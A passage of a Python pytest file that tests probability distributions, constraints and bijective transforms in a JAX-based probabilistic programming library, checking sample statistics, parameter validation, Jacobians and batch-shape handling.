tuple(axes)\n samples_re = jnp.moveaxis(samples, axes, jnp.arange(len(axes)))\n subshape = samples_re.shape[: len(axes)]\n ixi = product(*[range(k) for k in subshape])\n for ix in ixi:\n # mean\n def get_min_shape(ix, batch_shape):\n return min(ix, tuple(map(lambda x: x - 1, batch_shape)))\n\n ix_loc = get_min_shape(ix, d_jax.loc.shape[: len(ix)])\n jnp.allclose(\n jnp.mean(samples_re[ix], 0),\n jnp.squeeze(d_jax.mean[ix_loc]),\n rtol=0.5,\n atol=1e-2,\n )\n # cov\n samples_mvn = jnp.squeeze(samples_re[ix]).reshape(\n sample_shape + (-1,), order=\"F\"\n )\n ix_col = get_min_shape(ix, d_jax.scale_tril_column.shape[: len(ix)])\n ix_row = get_min_shape(ix, d_jax.scale_tril_row.shape[: len(ix)])\n scale_tril = my_kron(\n d_jax.scale_tril_column[ix_col],\n d_jax.scale_tril_row[ix_row],\n )\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=1e-2)\n else: # unbatched\n # mean\n jnp.allclose(\n jnp.mean(samples, 0),\n jnp.squeeze(d_jax.mean),\n rtol=0.5,\n atol=1e-2,\n )\n # cov\n samples_mvn = jnp.squeeze(samples).reshape(sample_shape + (-1,), order=\"F\")\n scale_tril = my_kron(\n jnp.squeeze(d_jax.scale_tril_column), jnp.squeeze(d_jax.scale_tril_row)\n )\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=1e-2)\n else:\n if jnp.all(jnp.isfinite(d_jax.mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05, atol=1e-2)\n if isinstance(d_jax, dist.CAR):\n pytest.skip(\"CAR distribution does not have `variance` implemented.\")\n if isinstance(d_jax, dist.Gompertz):\n pytest.skip(\"Gompertz distribution does not have `variance` implemented.\")\n if jnp.all(jnp.isfinite(d_jax.variance)):\n assert_allclose(\n jnp.std(samples, 0), jnp.sqrt(d_jax.variance), rtol=0.05, atol=1e-2\n )\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\[email protected](\"prepend_shape\", [(), (2,), (2, 3)])\ndef test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):\n if jax_dist in (\n _TruncatedNormal,\n _TruncatedCauchy,\n _GaussianMixture,\n _Gaussian2DMixture,\n _GeneralMixture,\n _General2DMixture,\n ):\n pytest.skip(f\"{jax_dist.__name__} is a function, not a class\")\n dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]\n\n valid_params, oob_params = list(params), list(params)\n key = random.PRNGKey(1)\n dependent_constraint = False\n for i in range(len(params)):\n if (\n jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky)\n and dist_args[i] != \"concentration\"\n ):\n continue\n if \"SineSkewed\" in jax_dist.__name__ and dist_args[i] != \"skewness\":\n continue\n if jax_dist is dist.EulerMaruyama and dist_args[i] != \"t\":\n continue\n if (\n jax_dist is dist.TwoSidedTruncatedDistribution\n and dist_args[i] == \"base_dist\"\n ):\n continue\n if jax_dist is dist.GaussianRandomWalk and dist_args[i] == \"num_steps\":\n continue\n if (\n jax_dist is dist.SineBivariateVonMises\n and dist_args[i] == \"weighted_correlation\"\n ):\n continue\n if params[i] is None:\n oob_params[i] = None\n valid_params[i] = None\n continue\n constraint = jax_dist.arg_constraints[dist_args[i]]\n if isinstance(constraint, constraints._Dependent):\n dependent_constraint = True\n break\n key, key_gen = random.split(key)\n oob_params[i] = gen_values_outside_bounds(\n constraint, jnp.shape(params[i]), key_gen\n )\n valid_params[i] = gen_values_within_bounds(\n constraint, jnp.shape(params[i]), key_gen\n )\n if jax_dist is dist.MultivariateStudentT:\n # As mean is only defined for df > 1 & we instantiate\n # scipy.stats.multivariate_t with same mean as jax_dist\n # we need to ensure this is defined, so force df >= 1\n valid_params[0] += 1\n\n if jax_dist is dist.LogUniform:\n # scipy.stats.loguniform take parameter a and b\n # which is a > 0 and b > a.\n # gen_values_within_bounds() generates just\n # a > 0 and b > 0. Then, make b = a + b.\n valid_params[1] += valid_params[0]\n\n assert jax_dist(*oob_params)\n\n # Invalid parameter values throw ValueError\n if not dependent_constraint and (\n jax_dist is not _ImproperWrapper and \"SineSkewed\" not in jax_dist.__name__\n ):\n with pytest.raises(ValueError):\n jax_dist(*oob_params, validate_args=True)\n\n with pytest.raises(ValueError):\n # test error raised under jit omnistaging\n oob_params = jax.device_get(oob_params)\n\n def dist_gen_fn():\n d = jax_dist(*oob_params, validate_args=True)\n return d\n\n jax.jit(dist_gen_fn)()\n\n d = jax_dist(*valid_params, validate_args=True)\n\n # Test agreement of log density evaluation on randomly generated samples\n # with scipy's implementation when available.\n if (\n sp_dist\n and not _is_batched_multivariate(d)\n and not (d.event_shape and prepend_shape)\n ):\n valid_samples = gen_values_within_bounds(\n d.support, size=prepend_shape + d.batch_shape + d.event_shape\n )\n try:\n expected = sp_dist(*valid_params).logpdf(valid_samples)\n except AttributeError:\n expected = sp_dist(*valid_params).logpmf(valid_samples)\n assert_allclose(d.log_prob(valid_samples), expected, atol=1e-5, rtol=1e-5)\n\n # Out of support samples throw ValueError\n oob_samples = gen_values_outside_bounds(\n d.support, size=prepend_shape + d.batch_shape + d.event_shape\n )\n with pytest.warns(UserWarning, match=\"Out-of-support\"):\n d.log_prob(oob_samples)\n\n with pytest.warns(UserWarning, match=\"Out-of-support\"):\n # test warning work under jit omnistaging\n oob_samples = jax.device_get(oob_samples)\n valid_params = jax.device_get(valid_params)\n\n def log_prob_fn():\n d = jax_dist(*valid_params, validate_args=True)\n return d.log_prob(oob_samples)\n\n jax.jit(log_prob_fn)()\n\n\ndef test_omnistaging_invalid_param():\n def f(x):\n return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)\n\n with pytest.raises(ValueError, match=\"got invalid\"):\n jax.jit(f)(0)\n\n\ndef test_omnistaging_invalid_sample():\n def f(x):\n return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)\n\n with pytest.warns(UserWarning, match=\"Out-of-support\"):\n jax.jit(f)(0)\n\n\ndef test_categorical_log_prob_grad():\n data = jnp.repeat(jnp.arange(3), 10)\n\n def f(x):\n return (\n dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(data).sum()\n )\n\n def g(x):\n return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data).sum()\n\n x = 0.5\n fx, grad_fx = jax.value_and_grad(f)(x)\n gx, grad_gx = jax.value_and_grad(g)(x)\n assert_allclose(fx, gx, rtol=1e-6)\n assert_allclose(grad_fx, grad_gx, atol=1e-4)\n\n\ndef test_beta_proportion_invalid_mean():\n with dist.distribution.validation_enabled(), pytest.raises(\n ValueError, match=r\"^BetaProportion distribution got invalid mean parameter\\.$\"\n ):\n dist.BetaProportion(1.0, 1.0)\n\n\n########################################\n# Tests for constraints and transforms #\n########################################\n\n\[email protected](\n \"constraint, x, expected\",\n [\n (constraints.boolean, np.array([True, False]), np.array([True, True])),\n (constraints.boolean, np.array([1, 1]), np.array([True, True])),\n (constraints.boolean, np.array([-1, 1]), np.array([False, True])),\n (\n constraints.corr_cholesky,\n np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]),\n np.array([True, False]),\n ), # NB: not lower_triangular\n (\n constraints.corr_cholesky,\n np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, 0.5]]]),\n np.array([False, False]),\n ), # NB: not positive_diagonal & not unit_norm_row\n (\n constraints.corr_matrix,\n np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]),\n np.array([True, False]),\n ), # NB: not lower_triangular\n (\n constraints.corr_matrix,\n np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, 0.5]]]),\n np.array([False, False]),\n ), # NB: not unit diagonal\n (constraints.greater_than(1), 3, True),\n (\n constraints.greater_than(1),\n np.array([-1, 1, 5]),\n np.array([False, False, True]),\n ),\n (constraints.integer_interval(-3, 5), 0, True),\n (\n constraints.integer_interval(-3, 5),\n np.array([-5, -3, 0, 1.1, 5, 7]),\n np.array([False, True, True, False, True, False]),\n ),\n (constraints.interval(-3, 5), 0, True),\n (\n constraints.interval(-3, 5),\n np.array([-5, -3, 0, 5, 7]),\n np.array([False, True, True, True, False]),\n ),\n (constraints.less_than(1), -2, True),\n (\n constraints.less_than(1),\n np.array([-1, 1, 5]),\n np.array([True, False, False]),\n ),\n (constraints.lower_cholesky, np.array([[1.0, 0.0], [-2.0, 0.1]]), True),\n (\n constraints.lower_cholesky,\n np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]),\n np.array([False, False]),\n ),\n (constraints.nonnegative_integer, 3, True),\n (\n constraints.nonnegative_integer,\n np.array([-1.0, 0.0, 5.0]),\n np.array([False, True, True]),\n ),\n (constraints.positive, 3, True),\n (constraints.positive, np.array([-1, 0, 5]), np.array([False, False, True])),\n (constraints.positive_definite, np.array([[1.0, 0.3], [0.3, 1.0]]), True),\n (\n constraints.positive_definite,\n np.array([[[2.0, 0.4], [0.3, 2.0]], [[1.0, 0.1], [0.1, 0.0]]]),\n np.array([False, False]),\n ),\n (constraints.positive_integer, 3, True),\n (\n constraints.positive_integer,\n np.array([-1.0, 0.0, 5.0]),\n np.array([False, False, True]),\n ),\n (constraints.real, -1, True),\n (\n constraints.real,\n np.array([np.inf, -np.inf, np.nan, np.pi]),\n np.array([False, False, False, True]),\n ),\n (constraints.simplex, np.array([0.1, 0.3, 0.6]), True),\n (\n constraints.simplex,\n np.array([[0.1, 0.3, 0.6], [-0.1, 0.6, 0.5], [0.1, 0.6, 0.5]]),\n np.array([True, False, False]),\n ),\n (constraints.softplus_positive, 3, True),\n (\n constraints.softplus_positive,\n np.array([-1, 0, 5]),\n np.array([False, False, True]),\n ),\n (\n constraints.softplus_lower_cholesky,\n np.array([[1.0, 0.0], [-2.0, 0.1]]),\n True,\n ),\n (\n constraints.softplus_lower_cholesky,\n np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]),\n np.array([False, False]),\n ),\n (constraints.unit_interval, 0.1, True),\n (\n constraints.unit_interval,\n np.array([-5, 0, 0.5, 1, 7]),\n np.array([False, True, True, True, False]),\n ),\n (\n constraints.sphere,\n np.array([[1, 0, 0], [0.5, 0.5, 0]]),\n np.array([True, False]),\n ),\n (\n constraints.open_interval(0.0, 1.0),\n np.array([-5, 0, 0.5, 1, 7]),\n np.array([False, False, True, False, False]),\n ),\n ],\n)\ndef test_constraints(constraint, x, expected):\n v = constraint.feasible_like(x)\n if jnp.result_type(v) == \"float32\" or jnp.result_type(v) == \"float64\":\n assert not constraint.is_discrete\n assert_array_equal(constraint(x), expected)\n\n feasible_value = constraint.feasible_like(x)\n assert jnp.shape(feasible_value) == jnp.shape(x)\n assert_allclose(constraint(feasible_value), jnp.full(jnp.shape(expected), True))\n\n try:\n inverse = biject_to(constraint).inv(feasible_value)\n except NotImplementedError:\n pass\n else:\n assert_allclose(inverse, jnp.zeros_like(inverse), atol=2e-7)\n\n\[email protected](\n \"constraint\",\n [\n constraints.corr_cholesky,\n constraints.corr_matrix,\n constraints.greater_than(2),\n constraints.interval(-3, 5),\n constraints.l1_ball,\n constraints.less_than(1),\n constraints.lower_cholesky,\n constraints.scaled_unit_lower_cholesky,\n constraints.ordered_vector,\n constraints.positive,\n constraints.positive_definite,\n constraints.positive_ordered_vector,\n constraints.real,\n constraints.real_vector,\n constraints.simplex,\n constraints.softplus_positive,\n constraints.softplus_lower_cholesky,\n constraints.unit_interval,\n constraints.open_interval(0.0, 1.0),\n ],\n ids=lambda x: x.__class__,\n)\[email protected](\"shape\", [(), (1,), (3,), (6,), (3, 1), (1, 3), (5, 3)])\ndef test_biject_to(constraint, shape):\n transform = biject_to(constraint)\n event_dim = transform.domain.event_dim\n if isinstance(constraint, constraints._Interval):\n assert transform.codomain.upper_bound == constraint.upper_bound\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._GreaterThan):\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._LessThan):\n assert transform.codomain.upper_bound == constraint.upper_bound\n if len(shape) < event_dim:\n return\n rng_key = random.PRNGKey(0)\n x = random.normal(rng_key, shape)\n y = transform(x)\n\n assert transform.forward_shape(x.shape) == y.shape\n assert transform.inverse_shape(y.shape) == x.shape\n\n # test inv work for NaN arrays:\n x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))\n assert x_nan.shape == x.shape\n\n # test codomain\n batch_shape = shape if event_dim == 0 else shape[:-1]\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=jnp.bool_))\n\n # test inv\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-5, rtol=1e-5)\n\n # test domain, currently all is constraints.real or constraints.real_vector\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n\n # test log_abs_det_jacobian\n actual = transform.log_abs_det_jacobian(x, y)\n assert jnp.shape(actual) == batch_shape\n if len(shape) == event_dim:\n if constraint is constraints.simplex:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)[:, :-1])[1]\n elif constraint in [\n constraints.real_vector,\n constraints.ordered_vector,\n constraints.positive_ordered_vector,\n constraints.l1_ball,\n ]:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n elif constraint in [constraints.corr_cholesky, constraints.corr_matrix]:\n vec_transform = lambda x: matrix_to_tril_vec( # noqa: E731\n transform(x), diagonal=-1\n )\n y_tril = matrix_to_tril_vec(y, diagonal=-1)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y, diagonal=-1)\n if constraint is constraints.corr_matrix:\n # fill the upper triangular part\n matrix = (\n matrix\n + jnp.swapaxes(matrix, -2, -1)\n + jnp.identity(matrix.shape[-1])\n )\n return transform.inv(matrix)\n\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform)(y_tril))[1]\n elif constraint in [\n constraints.lower_cholesky,\n constraints.scaled_unit_lower_cholesky,\n constraints.positive_definite,\n constraints.softplus_lower_cholesky,\n ]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x)) # noqa: E731\n y_tril = matrix_to_tril_vec(y)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y)\n if constraint is constraints.positive_definite:\n # fill the upper triangular part\n matrix = (\n matrix\n + jnp.swapaxes(matrix, -2, -1)\n - jnp.diag(jnp.diag(matrix))\n )\n return transform.inv(matrix)\n\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform)(y_tril))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n\n assert_allclose(actual, expected, atol=1e-5, rtol=1e-5)\n assert_allclose(actual, -inv_expected, atol=1e-5, rtol=1e-5)\n\n\n# NB: skip transforms which are tested in `test_biject_to`\[email protected](\n \"transform, event_shape\",\n [\n (PermuteTransform(np.array([3, 0, 4, 1, 2])), (5,)),\n (PowerTransform(2.0), ()),\n (SoftplusTransform(), ()),\n (\n LowerCholeskyAffine(\n np.array([1.0, 2.0]), np.array([[0.6, 0.0], [1.5, 0.4]])\n ),\n (2,),\n ),\n (\n transforms.ComposeTransform(\n [\n biject_to(constraints.simplex),\n SimplexToOrderedTransform(0.0),\n biject_to(constraints.ordered_vector).inv,\n ]\n ),\n (5,),\n ),\n ],\n)\[email protected](\n \"batch_shape\",\n [\n (),\n (1,),\n (3,),\n (6,),\n (3, 1),\n (1, 3),\n (5, 3),\n ],\n)\ndef test_bijective_transforms(transform, event_shape, batch_shape):\n shape = batch_shape + event_shape\n rng_key = random.PRNGKey(0)\n x = biject_to(transform.domain)(random.normal(rng_key, shape))\n y = transform(x)\n\n # test codomain\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))\n\n # test inv\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-6, rtol=1e-4)\n assert transform.inv.inv is transform\n assert transform.inv is transform.inv\n assert transform.domain is transform.inv.codomain\n assert transform.codomain is transform.inv.domain\n\n # test domain\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n\n # test log_abs_det_jacobian\n actual = transform.log_abs_det_jacobian(x, y)\n assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))\n assert jnp.shape(actual) == batch_shape\n if len(shape) == transform.domain.event_dim:\n if len(event_shape) == 1:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n\n assert_allclose(actual, expected, atol=1e-6)\n assert_allclose(actual, -inv_expected, atol=1e-6)\n\n\[email protected](\"batch_shape\", [(), (5,)])\ndef test_composed_transform(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t1])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 2\n\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n expected_log_det = (\n jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, y / 2) + jnp.log(2) * 9\n )\n assert_allclose(log_det, expected_log_det)\n\n\[email protected](\"batch_shape\", [(), (5,)])\ndef test_composed_transform_1(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t2])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 3\n\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n z = t2(x * 2)\n expected_log_det = (\n jnp.log(2) * 6\n + t2.log_abs_det_jacobian(x * 2, z)\n + t2.log_abs_det_jacobian(z, t2(z)).sum(-1)\n )\n assert_allclose(log_det, expected_log_det)\n\n\[email protected](\"batch_shape\", [(), (5,)])\ndef test_simplex_to_order_transform(batch_shape):\n simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()\n simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)\n transform = SimplexToOrderedTransform()\n out = transform(simplex)\n assert out.shape == transform.forward_shape(simplex.shape)\n assert simplex.shape == transform.inverse_shape(out.shape)\n\n\[email protected](\"batch_shape\", [(), (5,)])\[email protected](\"prepend_event_shape\", [(), (4,)])\[email protected](\"sample_shape\", [(), (7,)])\ndef test_transformed_distribution(batch_shape, prepend_event_shape, sample_shape):\n base_dist = (\n dist.Normal(0, 1)\n .expand(batch_shape + prepend_event_shape + (6,))\n .to_event(1 + len(prepend_event_shape))\n )\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n d = dist.TransformedDistribution(base_dist, [t1, t2, t1])\n assert d.event_dim == 2 + len(prepend_event_shape)\n\n y = d.sample(random.PRNGKey(0), sample_shape)\n t = transforms.ComposeTransform([t1, t2, t1])\n x = t.inv(y)\n assert x.shape == sample_shape + base_dist.shape()\n log_prob = d.log_prob(y)\n assert log_prob.shape == sample_shape + batch_shape\n t_log_det = t.log_abs_det_jacobian(x, y)\n if prepend_event_shape:\n t_log_det = t_log_det.sum(-1)\n expected_log_prob = base_dist.log_prob(x) - t_log_det\n assert_allclose(log_prob, expected_log_prob, atol=1e-5)\n\n\[email protected](\n \"transformed_dist\",\n [\n dist.TransformedDistribution(\n dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()\n ),\n dist.TransformedDistribution(\n dist.Exponential(jnp.ones(2)),\n [\n transforms.PowerTransform(0.7),\n transforms.AffineTransform(0.0, jnp.ones(2) * 3),\n ],\n ),\n ],\n)\ndef test_transformed_distribution_intermediates(transformed_dist):\n sample, intermediates = transformed_dist.sample_with_intermediates(\n random.PRNGKey(1)\n )\n assert_allclose(\n transformed_dist.log_prob(sample, intermediates),\n transformed_dist.log_prob(sample),\n )\n\n\ndef test_transformed_transformed_distribution():\n loc, scale = -2, 3\n dist1 = dist.TransformedDistribution(\n dist.Normal(2, 3), transforms.PowerTransform(2.0)\n )\n dist2 = dist.TransformedDistribution(dist1, transforms.AffineTransform(-2, 3))\n assert isinstance(dist2.base_dist, dist.Normal)\n assert len(dist2.transforms) == 2\n assert isinstance(dist2.transforms[0], transforms.PowerTransform)\n assert isinstance(dist2.transforms[1], transforms.AffineTransform)\n\n rng_key = random.PRNGKey(0)\n assert_allclose(loc + scale * dist1.sample(rng_key), dist2.sample(rng_key))\n intermediates = dist2.sample_with_intermediates(rng_key)\n assert len(intermediates) == 2\n\n\ndef _make_iaf(input_dim, hidden_dims, rng_key):\n arn_init, arn = AutoregressiveNN(input_dim, hidden_dims, param_dims=[1, 1])\n _, init_params = arn_init(rng_key, (input_dim,))\n return InverseAutoregressiveTransform(partial(arn, init_params))\n\n\[email protected](\n \"ts\",\n [\n [transforms.PowerTransform(0.7), transforms.AffineTransform(2.0, 3.0)],\n [transforms.ExpTransform()],\n [\n transforms.ComposeTransform(\n [transforms.AffineTransform(-2, 3), transforms.ExpTransform()]\n ),\n transforms.PowerTransform(3.0),\n ],\n [\n _make_iaf(5, hidden_dims=[10], rng_key=random.PRNGKey(0)),\n transforms.PermuteTransform(jnp.arange(5)[::-1]),\n _make_iaf(5, hidden_dims=[10], rng_key=random.PRNGKey(1)),\n ],\n ],\n)\ndef test_compose_transform_with_intermediates(ts):\n transform = transforms.ComposeTransform(ts)\n x = random.normal(random.PRNGKey(2), (7, 5))\n y, intermediates = transform.call_with_intermediates(x)\n logdet = transform.log_abs_det_jacobian(x, y, intermediates)\n assert_allclose(y, transform(x))\n assert_allclose(logdet, transform.log_abs_det_jacobian(x, y))\n\n\[email protected](\"x_dim, y_dim\", [(3, 3), (3, 4)])\ndef test_unpack_transform(x_dim, y_dim):\n xy = np.random.randn(x_dim + y_dim)\n unpack_fn = lambda xy: {\"x\": xy[:x_dim], \"y\": xy[x_dim:]} # noqa: E731\n transform = transforms.UnpackTransform(unpack_fn)\n z = transform(xy)\n if x_dim == y_dim:\n with pytest.warns(UserWarning, match=\"UnpackTransform.inv\"):\n t = transform.inv(z)\n else:\n t = transform.inv(z)\n\n assert_allclose(t, xy)\n\n\[email protected](\"jax_dist, sp_dist, params\", CONTINUOUS)\ndef test_generated_sample_distribution(\n jax_dist, sp_dist, params, N_sample=100_000, key=random.PRNGKey(11)\n):\n \"\"\"On samplers that we do not get directly from JAX, (e.g. we only get\n Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test\n agreement in the empirical distribution of generated samples between our\n samplers and those from SciPy.\n \"\"\"\n\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n \"{} sampling method taken from upstream, no need to\"\n \"test generated samples.\".format(jax_dist.__name__)\n )\n\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05\n\n\[email protected](\n \"jax_dist, params, support\",\n [\n (dist.BernoulliLogits, (5.0,), jnp.arange(2)),\n (dist.BernoulliProbs, (0.5,), jnp.arange(2)),\n (dist.BinomialLogits, (4.5, 10), jnp.arange(11)),\n (dist.BinomialProbs, (0.5, 11), jnp.arange(12)),\n (dist.BetaBinomial, (2.0, 0.5, 12), jnp.arange(13)),\n (dist.CategoricalLogits, (np.array([3.0, 4.0, 5.0]),), jnp.arange(3)),\n (dist.CategoricalProbs, (np.array([0.1, 0.5, 0.4]),), jnp.arange(3)),\n ],\n)\[email protected](\"batch_shape\", [(5,), ()])\[email protected](\"expand\", [False, True])\ndef test_enumerate_support_smoke(jax_dist, params, support, batch_shape, expand):\n p0 = jnp.broadcast_to(params[0], batch_shape + jnp.shape(params[0]))\n actual = jax_dist(p0, *params[1:]).enumerate_support(expand=expand)\n expected = support.reshape((-1,) + (1,) * len(batch_shape))\n if expand:\n expected = jnp.broadcast_to(expected, support.shape + batch_shape)\n assert_allclose(actual, expected)\n\n\ndef test_zero_inflated_enumerate_support():\n base_dist = dist.Bernoulli(0.5)\n d = dist.ZeroInflatedDistribution(base_dist, gate=0.5)\n assert d.has_enumerate_support\n assert_allclose(d.enumerate_support(), base_dist.enumerate_support())\n\n\[email protected](\"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE)\[email protected](\"prepend_shape\", [(), (2, 3)])\[email protected](\"sample_shape\", [(), (4,)])\ndef test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):\n jax_dist = jax_dist(*params)\n new_batch_shape = prepend_shape + jax_dist.batch_shape\n expanded_dist = jax_dist.expand(new_batch_shape)\n rng_key = random.PRNGKey(0)\n samples = expanded_dist.sample(rng_key, sample_shape)\n assert expanded_dist.batch_shape == new_batch_shape\n assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape\n assert expanded_dist.log_prob(samples).shape == sample_shape + new_batch_shape\n # test expand of expand\n assert (\n expanded_dist.expand((3,) + new_batch_shape).batch_shape\n == (3,) + new_batch_shape\n )\n # test expand error\n if prepend_shape:\n with pytest.raises(ValueError, match=\"Cannot broadcast distribution of shape\"):\n assert expanded_dist.expand((3,) + jax_dist.batch_shape)\n\n\[email protected](\"base_shape\", [(2, 1, 5), (3, 1), (2, 1, 1), (1, 1, 5)])\[email protected](\"event_dim\", [0, 1, 2, 3])\[email protected](\"sample_shape\", [(1000,), (1000, 7, 1), (1000, 1, 7)])\ndef test_expand_shuffle_regression(base_shape, event_dim, sample_shape):\n expand_shape = (2, 3, 5)\n event_dim = min(event_dim, len(base_shape))\n loc = random.normal(random.PRNGKey(0), base_shape) * 10\n base_dist = dist.Normal(loc, 0.1).to_event(event_dim)\n expanded_dist = base_dist.expand(expand_shape[: len(expand_shape) - event_dim])\n samples = expanded_dist.sample(random.PRNGKey(1), sample_shape)\n expected_mean = jnp.broadcast_to(loc, sample_shape[1:] + expanded_dist.shape())\n assert_allclose(samples.mean(0), expected_mean, atol=0.1)\n\n\[email protected](\"batch_shape\", [(), (4,), (10, 3)])\ndef test_sine_bivariate_von_mises_batch_shape(batch_shape):\n phi_loc = jnp.broadcast_to(jnp.array(0.0), batch_shape)\n psi_loc = jnp.array(0.0)\n phi_conc = jnp.array(1.0)\n psi_conc = jnp.array(1.0)\n corr = jnp.array(0.1)\n\n sine = SineBivariateVonMises(phi_loc, psi_loc, phi_conc, psi_conc, corr)\n assert sine.batch_shape == batch_shape\n\n samples = sine.sample(random.PRNGKey(0))\n assert samples.shape == (*batch_shape, 2)\n\n\ndef test_sine_bivariate_von_mises_sample_mean():\n loc = jnp.array([[2.0, -1.0], [-2, 1.0]])\n\n sine = SineBivariateVonMises(*loc, 5000, 5000, 0.0)\n samples = sine.sample(random.PRNGKey(0), (5000,))\n\n assert_allclose(_circ_mean(samples).T, loc, rtol=5e-3)\n\n\[email protected](\"batch_shape\", [(), (4,)])\ndef test_polya_gamma(batch_shape, num_points=20000):\n d = dist.TruncatedPolyaGamma(batch_shape=batch_shape)\n rng_key = random.PRNGKey(0)\n\n # test density approximately normalized\n x = jnp.linspace(1.0e-6, d.truncation_point, num_points)\n prob = (d.truncation_point / num_points) * jnp.exp(\n logsumexp(d.log_prob(x), axis=-1)\n )\n assert_allclose(prob, jnp.ones(batch_shape), rtol=1.0e-4)\n\n # test mean of approximate sampler\n z = d.sample(rng_key, sample_shape=(3000,))\n mean = jnp.mean(z, axis=-1)\n assert_allclose(mean, 0.25 * jnp.ones(batch_shape), rtol=0.07)\n\n\[email protected](\n \"extra_event_dims,expand_shape\",\n [(0, (4, 3, 2, 1)), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))],\n)\ndef test_expand_reshaped_distribution(extra_event_dims, expand_shape):\n loc = jnp.zeros((1, 6))\n scale_tril = jnp.eye(6)\n d = dist.MultivariateNormal(loc, scale_tril=scale_tril)\n full_shape = (4, 1, 1, 1, 6)\n reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)\n cut = 4 - extra_event_dims\n batch_shape, event_shape = full_shape[:cut], full_shape[cut:]\n assert reshaped_dist.batch_shape == batch_shape\n assert reshaped_dist.event_shape == event_shape\n large = reshaped_dist.expand(expand_shape)\n assert large.batch_shape == expand_shape\n assert large.event_shape == event_shape\n\n # Throws error when batch shape cannot be broadcasted\n with pytest.raises((RuntimeError, ValueError)):\n reshaped_dist.expand(expand_shape + (3,))\n\n # Throws error when trying to shrink existing batch shape\n with pytest.raises((RuntimeError, ValueError)):\n large.expand(expand_shape[1:])\n\n\[email protected](\n \"batch_shape, mask_shape\",\n [((), ()), ((2,), ()), ((), (2,)), ((2,), (2,)), ((4, 2), (1, 2)), ((2,), (4, 2))],\n)\[email protected](\"event_shape\", [(), (3,)])\ndef test_mask(batch_shape, event_shape, mask_shape):\n jax_dist = (\n dist.Normal().expand(batch_shape + event_shape).to_event(len(event_shape))\n )\n mask = dist.Bernoulli(0.5).sample(random.PRNGKey(0), mask_shape)\n if mask_shape == ():\n 